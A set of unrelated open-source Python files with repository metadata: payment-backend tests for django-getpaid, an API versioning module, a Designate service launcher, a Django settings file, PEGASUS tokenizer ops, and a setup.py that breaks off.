from decimal import Decimal
from mock import Mock, patch
from hashlib import md5
from django.db.models.loading import get_model
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils import six
from django.core.exceptions import ImproperlyConfigured
from getpaid.backends.transferuj import PaymentProcessor
from getpaid.backends import transferuj
from getpaid_test_project.orders.models import Order
from getpaid_test_project.orders.factories import PaymentFactory
from getpaid.utils import get_backend_settings
if six.PY3:
unicode = str
class TransferujBackendTestCase(TestCase):
def test_online_not_allowed_ip(self):
self.assertEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None, None,
None, None, None, None, None, None))
# Tests allowing IPs given in settings
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': ('1.1.1.1', '1.2.3.4'), 'key': ''},
}):
self.assertEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
# Tests allowing all IPs
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': [], 'key': ''},
}):
self.assertNotEqual('IP ERR',
PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
def test_online_wrong_sig(self):
self.assertEqual('SIG ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'xxx'))
self.assertNotEqual('SIG ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'21b028c2dbdcb9ca272d1cc67ed0574e'))
def test_online_wrong_id(self):
self.assertEqual('ID ERR',
PaymentProcessor.online('195.149.229.109', '1111', '1', '', '1',
'123.45', None, None, None, None, None,
'15bb75707d4374bc6e578c0cbf5a7fc7'))
self.assertNotEqual('ID ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'f5f8276fbaa98a6e05b1056ab7c3a589'))
def test_online_crc_error(self):
self.assertEqual('CRC ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'99999', '123.45', None, None, None, None,
None, 'f5f8276fbaa98a6e05b1056ab7c3a589'))
self.assertEqual('CRC ERR',
PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'GRRGRRG', '123.45', None, None, None,
None, None,
'6a9e045010c27dfed24774b0afa37d0b'))
def test_online_payment_ok(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '123.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
def test_online_payment_ok_over(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '223.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('223.45'))
def test_online_payment_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'partially_paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('23.45'))
def test_online_payment_failure(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
False, 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'failed')
class PaymentProcessorGetGatewayUrl(TestCase):
def setUp(self):
self.payment = PaymentFactory()
self.pp = PaymentProcessor(self.payment)
def update_settings(self, data):
settings = get_backend_settings('getpaid.backends.transferuj')
settings.update(data)
return {'getpaid.backends.transferuj': settings}
def get_gateway_data(self):
settings = self.update_settings({'method': 'post'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
return data
def test_return_types(self):
settings = self.update_settings({'method': 'get'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
self.assertEqual(method, 'GET')
self.assertEqual(data, {})
self.assertIsInstance(url, str)
def test_default_config_url_transaction_params(self):
data = self.get_gateway_data()
crc = data['crc']
kwota = data['kwota']
id_ = data['id']
key = PaymentProcessor.get_backend_setting('key')
md5sum = six.text_type(id_) + kwota + six.text_type(crc) + key
md5sum = md5sum.encode('utf-8')
self.assertEqual(crc, self.payment.pk)
self.assertEqual(kwota, six.text_type(self.payment.amount))
self.assertEqual(id_, 1234)
self.assertEqual(data['md5sum'], md5(md5sum).hexdigest())
def test_default_config_url_data_params(self):
data = self.get_gateway_data()
self.assertEqual(data['email'], '[email protected]')
self.assertIn('opis', data)
self.assertNotIn('jezyk', data)
def get_urls(self):
return {
'wyn_url': reverse('getpaid-transferuj-online'),
'pow_url_blad': reverse('getpaid-transferuj-failure',
kwargs={'pk': self.payment.pk}),
'pow_url': reverse('getpaid-transferuj-success',
kwargs={'pk': self.payment.pk}),
}
def test_default_config_url_urls(self):
data = self.get_gateway_data()
for key, u in self.get_urls().items():
str_ = data[key]
self.assertTrue(str_.endswith(u),
"{} not end with {}".format(str_, u))
@patch.object(transferuj, 'get_domain')
def test_domains_http(self, patch_domain):
patch_domain.return_value = 'test'
data = self.get_gateway_data()
for key in self.get_urls():
self.assertTrue(data[key].startswith('http://test/'))
@patch.object(transferuj, 'get_domain')
def test_domains_https(self, patch_domain):
patch_domain.return_value = 'test'
settings = self.update_settings({
'force_ssl_online': True,
'force_ssl_return': True,
})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
data = self.get_gateway_data()
for key in self.get_urls():
str_ = data[key]
self.assertTrue(str_.startswith('https://test/'),
"{} not start with https://test/".format(str_))
def test_post(self):
settings = self.update_settings({'method': 'post'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
url, method, data = self.pp.get_gateway_url(Mock())
self.assertEqual(method, 'POST')
self.assertNotEqual(data, {})
def test_bad_type(self):
settings = self.update_settings({'method': 'update'})
with self.settings(GETPAID_BACKENDS_SETTINGS=settings):
with self.assertRaises(ImproperlyConfigured):
self.pp.get_gateway_url(Mock())
| {
"content_hash": "7068a82ee2d49bb44c7d3d3f81652199",
"timestamp": "",
"source": "github",
"line_count": 258,
"max_line_length": 121,
"avg_line_length": 51.84108527131783,
"alnum_prop": 0.4707289719626168,
"repo_name": "kamilglod/django-getpaid",
"id": "693a25abe5549e376ed5266a6054810e666bfa60",
"size": "13390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "getpaid_test_project/getpaid_test_project/orders/tests/test_transferuj.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6266"
},
{
"name": "Python",
"bytes": "163697"
}
],
"symlink_target": ""
} |
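A minimal standalone sketch (not part of the test suite above) of the checksum scheme these tests verify: per test_default_config_url_transaction_params, the md5sum parameter is md5 over the concatenation id + kwota + crc + key. The function name and the sample values below are hypothetical.

from hashlib import md5

def transferuj_md5sum(seller_id, kwota, crc, key):
    # Field order matches the tests above: id, kwota, crc, key.
    raw = u'{}{}{}{}'.format(seller_id, kwota, crc, key).encode('utf-8')
    return md5(raw).hexdigest()

# Hypothetical values shaped like the test fixtures (id=1234, key='').
print(transferuj_md5sum(1234, '123.45', 1, ''))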
"""
Copied+modified from rest_framework.versioning, which is licensed under the BSD license:
*******************************************************************************
Copyright (c) 2011-2016, Tom Christie
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*******************************************************************************
"""
from __future__ import unicode_literals
import re
from django.utils.translation import ugettext_lazy as _
from api import exceptions
from api import settings as api_settings
from api.compat import unicode_http_header
# noinspection PyProtectedMember
from api.reverse import _reverse
from api.utils.mediatypes import MediaType
from api.utils.urls import replace_query_param
class BaseVersioning(object):
default_version = api_settings.DEFAULT_VERSION
allowed_versions = api_settings.ALLOWED_VERSIONS
version_param = api_settings.VERSION_PARAM
def determine_version(self, request, *args, **kwargs):
msg = '{cls}.determine_version() must be implemented.'
raise NotImplementedError(msg.format(
cls=self.__class__.__name__
))
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
return _reverse(viewname, args, kwargs, request, format, **extra)
def is_allowed_version(self, version):
if not self.allowed_versions:
return True
return (version == self.default_version) or (version in self.allowed_versions)
class AcceptHeaderVersioning(BaseVersioning):
"""
GET /something/ HTTP/1.1
Host: example.com
Accept: application/json; version=1.0
"""
invalid_version_message = _('Invalid version in "Accept" header.')
def determine_version(self, request, *args, **kwargs):
media_type = MediaType(request.accepted_media_type)
version = media_type.params.get(self.version_param, self.default_version)
version = unicode_http_header(version)
if not self.is_allowed_version(version):
raise exceptions.NotAcceptable(self.invalid_version_message)
return version
# We don't need to implement `reverse`, as the versioning is based
# on the `Accept` header, not on the request URL.
class URLPathVersioning(BaseVersioning):
"""
To the client this is the same style as `NamespaceVersioning`.
The difference is in the backend - this implementation uses
Django's URL keyword arguments to determine the version.
An example URL conf for two views that accept two different versions.
urlpatterns = [
url(r'^(?P<version>(v1|v2))/users/$', users_list, name='users-list'),
url(r'^(?P<version>(v1|v2))/users/(?P<pk>[0-9]+)/$', users_detail, name='users-detail')
]
GET /v1/something/ HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in URL path.')
def determine_version(self, request, *args, **kwargs):
version = kwargs.get(self.version_param, self.default_version)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
if request.version is not None:
kwargs = {} if (kwargs is None) else kwargs
kwargs[self.version_param] = request.version
return super(URLPathVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
class NamespaceVersioning(BaseVersioning):
"""
To the client this is the same style as `URLPathVersioning`.
The difference is in the backend - this implementation uses
Django's URL namespaces to determine the version.
An example URL conf that is namespaced into two separate versions
# users/urls.py
urlpatterns = [
url(r'^/users/$', users_list, name='users-list'),
url(r'^/users/(?P<pk>[0-9]+)/$', users_detail, name='users-detail')
]
# urls.py
urlpatterns = [
url(r'^v1/', include('users.urls', namespace='v1')),
url(r'^v2/', include('users.urls', namespace='v2'))
]
GET /v1/something/ HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in URL path. Does not match any version namespace.')
def determine_version(self, request, *args, **kwargs):
resolver_match = getattr(request, 'resolver_match', None)
if resolver_match is None or not resolver_match.namespace:
return self.default_version
# Allow for possibly nested namespaces.
possible_versions = resolver_match.namespace.split(':')
for version in possible_versions:
if self.is_allowed_version(version):
return version
raise exceptions.NotFound(self.invalid_version_message)
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
if request.version is not None:
viewname = self.get_versioned_viewname(viewname, request)
return super(NamespaceVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
# noinspection PyMethodMayBeStatic
def get_versioned_viewname(self, viewname, request):
return request.version + ':' + viewname
class HostNameVersioning(BaseVersioning):
"""
GET /something/ HTTP/1.1
Host: v1.example.com
Accept: application/json
"""
hostname_regex = re.compile(r'^([a-zA-Z0-9]+)\.[a-zA-Z0-9]+\.[a-zA-Z0-9]+$')
invalid_version_message = _('Invalid version in hostname.')
def determine_version(self, request, *args, **kwargs):
hostname, separator, port = request.get_host().partition(':')
match = self.hostname_regex.match(hostname)
if not match:
return self.default_version
version = match.group(1)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# We don't need to implement `reverse`, as the hostname will already be
# preserved as part of the REST framework `reverse` implementation.
class QueryParameterVersioning(BaseVersioning):
"""
GET /something/?version=0.1 HTTP/1.1
Host: example.com
Accept: application/json
"""
invalid_version_message = _('Invalid version in query parameter.')
def determine_version(self, request, *args, **kwargs):
version = request.query_params.get(self.version_param, self.default_version)
if not self.is_allowed_version(version):
raise exceptions.NotFound(self.invalid_version_message)
return version
# noinspection PyShadowingBuiltins
def reverse(self, viewname, args=None, kwargs=None, request=None, format=None, **extra):
url = super(QueryParameterVersioning, self).reverse(
viewname, args, kwargs, request, format, **extra
)
if request.version is not None:
return replace_query_param(url, self.version_param, request.version)
return url
| {
"content_hash": "f68308707f0a8072e8c8af19a141dbc7",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 101,
"avg_line_length": 40.645933014354064,
"alnum_prop": 0.6799293702177751,
"repo_name": "erigones/esdc-ce",
"id": "af76702c63bf9fbed5aa30b13e212714193632e9",
"size": "8511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/versioning.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "2728"
},
{
"name": "C",
"bytes": "8581"
},
{
"name": "CSS",
"bytes": "146461"
},
{
"name": "DTrace",
"bytes": "2250"
},
{
"name": "Erlang",
"bytes": "18842"
},
{
"name": "HTML",
"bytes": "473343"
},
{
"name": "JavaScript",
"bytes": "679240"
},
{
"name": "Jinja",
"bytes": "29584"
},
{
"name": "PLpgSQL",
"bytes": "17954"
},
{
"name": "Perl",
"bytes": "93955"
},
{
"name": "Python",
"bytes": "3124524"
},
{
"name": "Ruby",
"bytes": "56"
},
{
"name": "SCSS",
"bytes": "82814"
},
{
"name": "Shell",
"bytes": "281885"
}
],
"symlink_target": ""
} |
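A self-contained sketch (independent of the api package above) of the hostname convention HostNameVersioning implements: the first label of a three-label host selects the version, with a fallback to the default. DEFAULT_VERSION and ALLOWED_VERSIONS below are hypothetical stand-ins for the api.settings values.

import re

# Hypothetical configuration; the real values come from api.settings.
DEFAULT_VERSION = 'v1'
ALLOWED_VERSIONS = ('v1', 'v2')

HOSTNAME_RE = re.compile(r'^([a-zA-Z0-9]+)\.[a-zA-Z0-9]+\.[a-zA-Z0-9]+$')

def version_from_host(host):
    # Mirrors HostNameVersioning: the first label of a three-label
    # hostname names the version; anything else falls back to the default.
    hostname = host.partition(':')[0]
    match = HOSTNAME_RE.match(hostname)
    if not match:
        return DEFAULT_VERSION
    version = match.group(1)
    if version not in ALLOWED_VERSIONS:
        raise ValueError('Invalid version in hostname.')
    return version

print(version_from_host('v2.example.com'))  # -> 'v2'
print(version_from_host('localhost:8000'))  # -> 'v1' (default)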
import sys
from oslo_config import cfg
from oslo_log import log as logging
from oslo_reports import guru_meditation_report as gmr
from designate import service
from designate import utils
from designate import version
from designate.zone_manager import service as zone_manager_service
CONF = cfg.CONF
CONF.import_opt('workers', 'designate.zone_manager',
group='service:zone_manager')
CONF.import_opt('threads', 'designate.zone_manager',
group='service:zone_manager')
def main():
utils.read_config('designate', sys.argv)
logging.setup(CONF, 'designate')
gmr.TextGuruMeditation.setup_autorun(version)
server = zone_manager_service.Service(
threads=CONF['service:zone_manager'].threads)
service.serve(server, workers=CONF['service:zone_manager'].workers)
service.wait()
| {
"content_hash": "51da01250d3d5f05874106cec161b5e2",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 71,
"avg_line_length": 29.928571428571427,
"alnum_prop": 0.7303102625298329,
"repo_name": "grahamhayes/designate",
"id": "fa10073a823fe2e26e9ae156ad1d635af8ced519",
"size": "1494",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "designate/cmd/zone_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2292184"
},
{
"name": "Ruby",
"bytes": "3933"
},
{
"name": "Shell",
"bytes": "25961"
}
],
"symlink_target": ""
} |
"""
Django settings for VetAppDjango project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# python3 manage.py migrate --run-syncdb
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pjt=bo&=nvv++87m1%8o5as4rrti8yzb2h*)w^f@%+av81kami'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'VetApp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'VetAppDjango.urls'
# WSGI_APPLICATION = 'VetAppDjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
DATE_FORMAT = 'd M Y'
DATE_INPUT_FORMATS = ['%d %b %Y']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| {
"content_hash": "bab1b989e3f9096de052b00d01ed26aa",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 71,
"avg_line_length": 25.46788990825688,
"alnum_prop": 0.6887608069164265,
"repo_name": "mape90/VetAppDjango",
"id": "f7ea4e04c707be73af57828dd0a19479d21852c5",
"size": "2776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "VetAppDjango/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "9874"
},
{
"name": "JavaScript",
"bytes": "8802"
},
{
"name": "Python",
"bytes": "63904"
}
],
"symlink_target": ""
} |
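A quick, hypothetical check of what the DATE_INPUT_FORMATS entry above accepts: '%d %b %Y' parses dates such as '05 Jan 2020'.

from datetime import datetime

# '%d %b %Y' is the only input format configured above.
print(datetime.strptime('05 Jan 2020', '%d %b %Y').date())  # 2020-01-05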
"""Parsing with public available ops.
This is a wrapper of sentencepiece ops for public release.
"""
from typing import List, Tuple
import tensorflow as tf
import tensorflow_text as tf_text
import sentencepiece as sentencepiece_processor
_EOS = 1
_SOS = 4
_NUM_SHIFT_TOKENS = 103
_NEWLINE_SYMBOL = "<n>"
def _check_tokenizer_type(tokenizer_type: str) -> Tuple[int, bool]:
"""Checks tokenizer_type, returns num_shift_tokens and has_newline."""
if tokenizer_type not in [
"sentencepiece",
"sentencepiece_newline",
"sentencepiece_noshift",
"sentencepiece_noshift_newline",
]:
raise ValueError("Unsupported tokenizer type: %s" % tokenizer_type)
num_shift_tokens = 0 if "noshift" in tokenizer_type else _NUM_SHIFT_TOKENS
has_newline = "newline" in tokenizer_type
return num_shift_tokens, has_newline
def encode(text: tf.Tensor,
max_len: int,
vocab_filename: str,
tokenizer_type: str,
has_length_token: bool = False,
add_eos: bool = True,
add_sos: bool = False) -> tf.Tensor:
"""Operation that encodes tensor text into tensor ids.
Args:
text: input text tensor.
max_len: max number of encoded ids.
vocab_filename: vocabulary filename.
tokenizer_type: type of encoder.
has_length_token: whether text starts with a length token.
add_eos: whether to add eos token at the end of sequence.
add_sos: whether to add sos token at the start of sequence.
Returns:
ids: encoded ids from text.
"""
num_shift_tokens, has_newline = _check_tokenizer_type(tokenizer_type)
sp_model = tf.io.gfile.GFile(vocab_filename, "rb").read()
tokenizer = tf_text.SentencepieceTokenizer(model=sp_model)
batch_size = tf.shape(text)[0]
if has_newline:
text = tf.strings.regex_replace(text, "\n", _NEWLINE_SYMBOL + " ")
if has_length_token:
segs = tf.strings.split(text, " ")
length_token = tf.sparse.slice(segs, [0, 0], [batch_size, 1])
length_token = tf.sparse.to_dense(length_token)
length_id = tf.strings.to_number(length_token, out_type=tf.int64)
text = tf.sparse.slice(segs, [0, 1], [batch_size, segs.dense_shape[1] - 1])
text = tf.sparse.to_dense(text)
text = tf.strings.reduce_join(text, axis=1, separator=" ")
text = tf.strings.strip(text)
ids = tokenizer.tokenize(text)
if add_eos:
eos = tf.fill([batch_size, 1], _EOS)
ids = tf.concat([ids, eos], axis=1)
ids = ids.to_tensor(default_value=0, shape=[batch_size, max_len])
ids = tf.where(ids > 1, ids + num_shift_tokens, ids)
ids = tf.cast(ids, tf.int64)
if has_length_token:
ids = tf.concat([length_id, ids[:, :-1]], axis=1)
if add_sos:
sos = tf.fill([batch_size, 1], _SOS)
ids = tf.concat([sos, ids[:, :-1]], axis=1)
ids = tf.reshape(ids, [batch_size, max_len])
return ids
def decode(ids: tf.Tensor, vocab_filename: str,
tokenizer_type: str) -> tf.Tensor:
"""Operation that decodes tensor ids into tensor text.
Args:
ids: tensor ids.
vocab_filename: vocabulary filename.
tokenizer_type: type of tokenizer.
Returns:
text: decoded tensor text from ids.
"""
num_shift_tokens, has_newline = _check_tokenizer_type(tokenizer_type)
sp_model = tf.io.gfile.GFile(vocab_filename, "rb").read()
tokenizer = tf_text.SentencepieceTokenizer(model=sp_model)
ids = tf.where(ids > 1 + num_shift_tokens, ids - num_shift_tokens, ids)
ids = tf.cast(ids, tf.int32)
text = tokenizer.detokenize(ids)
text = tf.reshape(text, [-1])
if has_newline:
text = tf.strings.regex_replace(text, _NEWLINE_SYMBOL, "\n")
text = tf.strings.regex_replace(text, "\n ", "\n")
return text
def create_text_encoder(tokenizer_type: str, vocab_filename: str):
"""Creates an encoder based on the vacob and tokenizer type."""
if tokenizer_type == "sentencepiece":
return SentencePieceEncoder(vocab_filename)
elif tokenizer_type == "sentencepiece_newline":
return SentencePieceEncoder(vocab_filename, newline_symbol=_NEWLINE_SYMBOL)
elif tokenizer_type == "sentencepiece_noshift":
return SentencePieceEncoder(vocab_filename, num_shift_tokens=0)
elif tokenizer_type == "sentencepiece_noshift_newline":
return SentencePieceEncoder(
vocab_filename, num_shift_tokens=0, newline_symbol=_NEWLINE_SYMBOL)
else:
raise ValueError("Unsupported encoder type: %s" % tokenizer_type)
class SentencePieceEncoder(object):
"""SentencePieceEncoder.
First two ids are pad=0 and eos=1; the remaining ids are shifted up by
num_shift_tokens. If newline_symbol is provided, newlines in the text are
replaced with that token.
"""
def __init__(self,
sentencepiece_model_file: str,
num_shift_tokens: int = _NUM_SHIFT_TOKENS,
newline_symbol: str = ""):
self._tokenizer = sentencepiece_processor.SentencePieceProcessor()
self._sp_model = tf.io.gfile.GFile(sentencepiece_model_file, "rb").read()
self._tokenizer.LoadFromSerializedProto(self._sp_model)
self._num_shift_tokens = num_shift_tokens
self._newline_symbol = newline_symbol
@property
def vocab_size(self) -> int:
return self._tokenizer.GetPieceSize() + self._num_shift_tokens
def encode(self, text: str) -> List[int]:
if self._newline_symbol:
text = text.replace("\n", self._newline_symbol + " ")
ids = self._tokenizer.EncodeAsIds(text)
ids = [i + self._num_shift_tokens if i > 1 else i for i in ids]
return ids
def decode(self, ids: List[int]) -> str:
ids = [
i - self._num_shift_tokens if i > 1 + self._num_shift_tokens else i
for i in ids
]
text = self._tokenizer.DecodeIds(ids)
if self._newline_symbol:
text = text.replace(self._newline_symbol, "\n").replace("\n ", "\n")
return text
| {
"content_hash": "6dff9f0c7f469f3ae189f051ed7aeed7",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 35.72222222222222,
"alnum_prop": 0.6690858821496457,
"repo_name": "google-research/pegasus",
"id": "c3f407a43a7d022af55a7e2170a5d71b8a154e68",
"size": "6373",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pegasus/flax/public_parsing_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "112333"
},
{
"name": "HTML",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "673550"
}
],
"symlink_target": ""
} |
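The id-shifting convention described in SentencePieceEncoder's docstring, restated as a minimal pure-Python sketch (mirroring, not replacing, the encode/decode above): pad=0 and eos=1 stay fixed while every other id moves up by num_shift_tokens.

_NUM_SHIFT_TOKENS = 103

def shift_ids(ids, num_shift_tokens=_NUM_SHIFT_TOKENS):
    # pad=0 and eos=1 keep their positions; every other id moves up.
    return [i + num_shift_tokens if i > 1 else i for i in ids]

def unshift_ids(ids, num_shift_tokens=_NUM_SHIFT_TOKENS):
    # Inverse mapping: only shifted ids (> 1 + num_shift_tokens) move back.
    return [i - num_shift_tokens if i > 1 + num_shift_tokens else i for i in ids]

shifted = shift_ids([0, 1, 2, 5])       # -> [0, 1, 105, 108]
assert unshift_ids(shifted) == [0, 1, 2, 5]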
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open('README.rst').read()
doclink = """
Documentation
-------------
The full documentation is at http://svtools.rtfd.org."""
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='svtools',
version='0.1.0',
description='A toolset for facilitating structural variation detection studies',
long_description=readme + '\n\n' + doclink + '\n\n' + history,
author='Zhen Zhang',
author_email='[email protected]',
url='https://github.com/zhangzhen/svtools',
packages=[
'svtools',
],
package_dir={'svtools': 'svtools'},
include_package_data=True,
install_requires=[
],
license='MIT',
zip_safe=False,
keywords='svtools',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: PyPy',
],
)
| {
"content_hash": "a823c70b8ee0f1519268778022074751",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 83,
"avg_line_length": 27.76923076923077,
"alnum_prop": 0.6094182825484764,
"repo_name": "zhangzhen/svtools",
"id": "d3777eb845935ea74dbc4d45ebb3eb33a6aaa3be",
"size": "1467",
"binary": false,
